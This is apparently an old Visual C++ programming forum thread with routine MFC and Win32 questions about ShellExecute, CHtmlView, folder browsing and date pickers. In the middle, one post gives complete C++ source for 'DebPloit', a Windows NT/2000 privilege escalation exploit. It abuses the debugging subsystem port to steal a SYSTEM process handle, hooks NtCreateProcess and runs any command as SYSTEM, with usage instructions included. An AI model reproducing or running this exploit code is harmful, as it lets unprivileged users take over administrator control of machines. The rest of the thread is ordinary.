|
Try GetSystemInfo().
Scratch
|
|
|
|
|
|
I'm trying to use:
ShellExecute(hwnd, NULL, "C:\\Program\\MyApp.EXE", NULL, NULL, SW_SHOW);
to launch a program after a button is clicked on the dialog box but I keep getting the error Undeclared identifier on hwnd, could someone please please help me.
Clara
|
|
|
|
|
you should try to use NULL or this->HWnd instead of hwnd which is not defined
|
|
|
|
|
Undeclared Identifier means exactly what it says... "hwnd" has not been declared. I suspect that either your forgot to have a line like this somewhere:
HANDLE hwnd;
or, you've declared it but are using the wrong case. Remember, hWnd is different to hwnd in C/C++.
If you're using MFC, then it's probably appropriate to call ShellExecute like this:
ShellExecute(this->m_hWnd, NULL, "C:\\Program\\MyApp.EXE", NULL, NULL, SW_SHOW);
Jon
Sorry to dissapoint you all with my lack of a witty or poignant signature.
|
|
|
|
|
the 'hwnd' parameter is that window that calls this function, or to say: Owns it!
You can decide which window that will own it. Pass your parent window to that.
Understand? Perhaps not, because my explanations in English doesn't have such good quality!
------------------------------------
Rickard Andersson, Suza Computing
ICQ#: 50302279
I'm from the winter country SWEDEN!
------------------------------------
|
|
|
|
|
GetHtmlDocument() returns NULL when I call it from OnInitialUpdate() in my CHtmlView derived class.
But later when I call it from a menu command handler function it works fine.
Why is this? Is this intended behaviour?
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
Nish [BusterBoy] wrote:
GetHtmlDocument() returns NULL when I call it from OnInitialUpdate()
Yes, that's how it works. At the time you reach OnInitialUpdate(), there is yet no document loaded into the web browser control. Your document will have been loaded in OnNavigateComplete2(). If you want to interact fully with the document, you should wait until the documents COM-object structure is comlete, after which OnDocumentComplete() is called.
|
|
|
|
|
Thanks again.
I overcame this issue by navigating to about:blank in my OnInitialUpdate(...) before I try to populate the control
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
Hello,
I hope everybody heard about the new vulnerability called DebPloit in Windows NT and Windows 2000. I've written small example that shows how you can obtain administrative privileges when your code is running under non-privileged account.
// debploit.cpp (Windows NT/2000)
//
// This program creates a process in the security context of the SYSTEM user.
// It uses a security hole in the Windows NT/2000 debugging subsystem
// originally discovered by Radim "EliCZ" Picha (March 9, 2002).
//
// You can have any privileges (you can be even Guest!) to execute this program
// and become an administrator of the local system.
//
// More information about this security hole can be found at http://www.anticracking.sk/EliCZ
// Microsoft was informed but still didn't release any hotfix (April 6, 2002).
// There is an unofficial hotfix that closes this security hole, you can download it from
// http://www.protect-me.com/freeware.html
//
//
// To link this program, you should have NTDLL.LIB from the DDK.
//
// (c) 2002 Ashot Oganesyan (ashot@protect-me.com)
// (c) 2002 SmartLine, Inc. (http://www.protect-me.com)
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
typedef LONG NTSTATUS;
#define NTAPI __stdcall
#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define DBG_SS_API_PORT_NAME L"\\DbgSsApiPort"
#define SS_CREATE_PROCESS_REQUEST 2
#define MAX_DBG_SS_CP_LPC_MESSAGE_SIZE 0x80
#define DBG_SS_CP_LPC_DATA_SIZE 0x38
#pragma pack(1)
typedef struct _ASMJUMP
{
BYTE mov_eax;
LPVOID address;
WORD jump_eax;
} ASMJUMP, *PASMJUMP;
#pragma pack()
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef struct _PORT_MESSAGE {
USHORT DataSize;
USHORT MessageSize;
USHORT MessageType;
USHORT VirtualRangesOffset;
CLIENT_ID CallerId;
ULONG MessageId;
ULONG SectionSize;
ULONG DebugEventCode;
ULONG Status;
CLIENT_ID DebuggeeId;
PVOID DbgSsKmMsg;
CLIENT_ID DebuggerId;
DWORD Unknown;
HANDLE hFile;
LPVOID ImageBase;
ULONG DebugInfoFileOffset;
ULONG DebugInfoSize;
LPVOID ThreadLocalBase;
LPTHREAD_START_ROUTINE ThreadStartAddress;
LPVOID ImageName;
USHORT Unicode;
USHORT wImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56) / sizeof(USHORT)];
} PORT_MESSAGE, *PPORT_MESSAGE;
typedef struct _PORT_SECTION_WRITE {
ULONG Length;
HANDLE SectionHandle;
ULONG SectionOffset;
ULONG ViewSize;
PVOID ViewBase;
PVOID TargetViewBase;
} PORT_SECTION_WRITE, *PPORT_SECTION_WRITE;
typedef struct _PORT_SECTION_READ {
ULONG Length;
ULONG ViewSize;
ULONG ViewBase;
} PORT_SECTION_READ, *PPORT_SECTION_READ;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#ifdef __cplusplus
extern "C" {
#endif
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString (
OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
NTSYSAPI
NTSTATUS
NTAPI
NtConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PPORT_SECTION_WRITE WriteSection OPTIONAL,
IN OUT PPORT_SECTION_READ ReadSection OPTIONAL,
OUT PULONG MaxMessageSize OPTIONAL,
IN OUT PVOID ConnectData OPTIONAL,
IN OUT PULONG ConnectDataLength OPTIONAL
);
NTSYSAPI
NTSTATUS
NTAPI
DbgUiConnectToDbg(VOID);
NTSYSAPI
NTSTATUS
NTAPI
NtRequestPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE RequestMessage
);
NTSYSAPI
NTSTATUS
NTAPI
NtClose(
IN HANDLE hObject
);
NTSYSAPI
ULONG
NTAPI
RtlNtStatusToDosError(
NTSTATUS status
);
#ifdef __cplusplus
}
#endif
HANDLE g_hParentProc;
DWORD g_dwFunc;
// Hooked NtCreateProcess
void __declspec(naked)HookedNtCreateProcess()
{
_asm
{
mov eax,g_hParentProc // change parent's process handle
mov dword ptr [esp + 16],eax
mov eax,g_dwFunc // value depends on OS version
lea edx,dword ptr [esp + 4]
int 2Eh
retn 20h
}
}
HANDLE StealProcessHandle(DWORD dwPid)
{
HANDLE hProcess = NULL,
hDbgSsApiPort = NULL;
SECURITY_QUALITY_OF_SERVICE Qos;
UNICODE_STRING usDbgSsApiPort;
PORT_MESSAGE PortMessage;
DEBUG_EVENT DebugEvent;
NTSTATUS Status = STATUS_SUCCESS;
Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
Qos.ImpersonationLevel = SecurityImpersonation;
Qos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
Qos.EffectiveOnly = TRUE;
RtlInitUnicodeString(&usDbgSsApiPort,DBG_SS_API_PORT_NAME);
// Connect to DbgSsApiPort
Status = NtConnectPort(&hDbgSsApiPort,&usDbgSsApiPort,&Qos,NULL,NULL,NULL,NULL,NULL);
if (!NT_SUCCESS(Status))
goto cleanup;
Status = DbgUiConnectToDbg();
if (!NT_SUCCESS(Status))
goto cleanup;
ZeroMemory(&PortMessage,sizeof(PORT_MESSAGE));
PortMessage.DataSize = DBG_SS_CP_LPC_DATA_SIZE;
PortMessage.MessageSize = sizeof(PORT_MESSAGE);
PortMessage.DebugEventCode = SS_CREATE_PROCESS_REQUEST;
PortMessage.DebuggeeId.UniqueProcess = (HANDLE)dwPid;
PortMessage.DebuggerId.UniqueProcess = (HANDLE)GetCurrentProcessId();
PortMessage.DebuggerId.UniqueThread = (HANDLE)GetCurrentThreadId();
Status = NtRequestPort(hDbgSsApiPort,&PortMessage);
if (!NT_SUCCESS(Status))
goto cleanup;
if (WaitForDebugEvent(&DebugEvent,1000) == FALSE)
goto cleanup;
if(DebugEvent.dwDebugEventCode != CREATE_PROCESS_DEBUG_EVENT || DebugEvent.u.CreateProcessInfo.hProcess == NULL)
goto cleanup;
// Duplicate the handle to get full access to it
DuplicateHandle(DebugEvent.u.CreateProcessInfo.hProcess,GetCurrentProcess(),GetCurrentProcess(),&hProcess,0,FALSE,DUPLICATE_SAME_ACCESS);
CloseHandle(DebugEvent.u.CreateProcessInfo.hProcess);
cleanup:
if (hDbgSsApiPort)
NtClose(hDbgSsApiPort);
if (!NT_SUCCESS(Status))
SetLastError(RtlNtStatusToDosError(Status));
return hProcess;
}
int _tmain(int argc, TCHAR* argv[])
{
UINT ProcessId;
OSVERSIONINFO VersionInfo;
DWORD dw;
MEMORY_BASIC_INFORMATION mbi;
PROCESS_INFORMATION pi;
STARTUPINFO si;
PASMJUMP NtCreateProcessHook;
LPTSTR lpProgramToExecute;
BOOL bWaitForParent = FALSE;
// Get OS version
VersionInfo.dwOSVersionInfoSize = sizeof(VersionInfo);
GetVersionEx(&VersionInfo);
// DebPloit works only on NT/W2K
if ( !(VersionInfo.dwPlatformId & VER_PLATFORM_WIN32_NT) || (VersionInfo.dwMajorVersion == 5 && VersionInfo.dwMinorVersion != 0) )
{
printf(TEXT("This program works only on Windows NT/2000\n"));
return -1;
}
if (argc < 2)
{
printf("\nUsage:\n\t DebPloit.exe [Parent PID] <Command Line>\n\n");
printf("Parent PID - parent process (if not specified - system process will be used)\n");
printf("Command Line - program to execute in the security context of Parent PID\n\n");
printf("Example:\n\t DebPloit.exe cmd\n");
printf("\t DebPloit.exe 123 cmd\n");
return -1;
}
// Get PID of the system process and the NtCreateProcess's number
switch(VersionInfo.dwMajorVersion)
{
case 3: // NT 3.51
ProcessId = 0x02;
g_dwFunc = 0x1E;
break;
case 4: // NT 4.0
ProcessId = 0x02;
g_dwFunc = 0x1F;
break;
case 5: // W2K
ProcessId = 0x08;
g_dwFunc = 0x29; // 0x2A - for W2K beta;
break;
}
if (argc > 2)
{
_stscanf(argv[1],TEXT("%lu"),&dw);
if (dw == 0)
{
printf("Invalid Parent PID specified!\n");
return -1;
}
lpProgramToExecute = argv[2];
if (dw != ProcessId)
bWaitForParent = TRUE;
ProcessId = dw;
}
else
lpProgramToExecute = argv[1];
// Get a pointer to NtCreateProcess
NtCreateProcessHook = (PASMJUMP)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")),"NtCreateProcess");
if (NtCreateProcessHook == NULL)
{
printf("GetProcAddress failed - %lu\n",GetLastError());
return -1;
}
// Enable write acess to NtCreateProcess in our own address space
VirtualQuery(NtCreateProcessHook,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
VirtualProtect(mbi.AllocationBase,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw);
// Redirect call to HookedNtCreateProcess:
//
// mov eax,HookedNtCreateProcess
// jmp eax
NtCreateProcessHook->mov_eax = 0xB8;
NtCreateProcessHook->address = HookedNtCreateProcess;
NtCreateProcessHook->jump_eax = 0xE0FF;
// Get a handle of the specified process
g_hParentProc = StealProcessHandle(ProcessId);
if (g_hParentProc == NULL)
{
printf("StealProcessHandle failed - %lu\n",GetLastError());
return -1;
}
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
ZeroMemory(&si,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
// Call modified CreateProcess (HookedNtCreateProcess will be called!)
if (CreateProcess(NULL,lpProgramToExecute,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
else
printf("CreateProcess failed - %lu\n",GetLastError());
// We must wait until the parent process terminates (if it's not a system process)
if (bWaitForParent)
{
FreeConsole();
WaitForSingleObject(g_hParentProc,INFINITE);
}
CloseHandle(g_hParentProc);
return 0;
}
You can also download full package from http://www.smartline.ru/software/DebPloitFix.zip
|
|
|
|
|
Hi
as far as i'm concerned, Microsoft has not release any patch to fix this security hole or did it???
|
|
|
|
|
No, he totally ignores this problem.
|
|
|
|
|
Just like the system popup.
I'm amumu, and you?
|
|
|
|
|
SHBrowseForFolder
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
BROWSEINFO bi;
bi.hwndOwner = this->m_hWnd;
bi.pidlRoot = NULL;
bi.pszDisplayName = "pszDisplayName";
bi.lpszTitle = "lpszTitle";
bi.ulFlags |= BIF_BROWSEFORCOMPUTER |BIF_RETURNONLYFSDIRS ;
bi.lpfn = NULL;
ITEMIDLIST* pil = SHBrowseForFolder(&bi);
That's my code, when i click ok, it will be error
I'm amumu, and you?
|
|
|
|
|
|
I got it, thank you
I'm amumu, and you?
|
|
|
|
|
Hello all,
I need some help with CHtmlView.
What I need to achieve :- I am creatying an HTML file in memory and need to preview it to the user.
Current plan :- Create a temporary HTML file and open it in Internet Explorer
Alternate plan :- Create a frame window, with a CHtmlView and jump up this frame window. Now I need to transfer my in-memory HTML code into this CHtmlView. How do I do that please?
Warm regards
Buster
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
So?
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
I found that the easiest way was to create the temp html file and then navigate to that. There didn't seem to be an easier way to do it. I came across a few ideas in the ATL mailing list archives but nothing that seemed easy to implement.
Michael
|
|
|
|
|
If nothing else works I'll have to try that out
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
If you want to load a HTML string from memory:
HRESULT hr;
IDispatch *pIDispatch = GetHtmlDocument();
IHTMLDocument2 *pIDoc;
IHTMLElement *pIBody;
hr = pIDispatch->QueryInterface(IID_IHTMLDocument2, (void**)&pIDoc);
hr = pIDoc->get_body(&pIBody);
hr = pIBody->put_innerHTML(_bstr_t("<b>Hello world</b>"));
(Error handling and clean up left as an exercise )
|
|
|
|
|
Thanks a lot
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
|
|
|
|
|
hi
I used the datetimepicker control and I added a member variable for this control, but when i use UpdateData(); the problem occured with any date befor 1969-12-31. is it a bug in vc6? can I use this control for date before 1969-12-31 and how?
Best Regards
|
|
|
|
|
I use this control without any problems.
Even the year 1817 is reachable.
Your accompanying code must be teh problem.
Geert.
|
|
|
|
|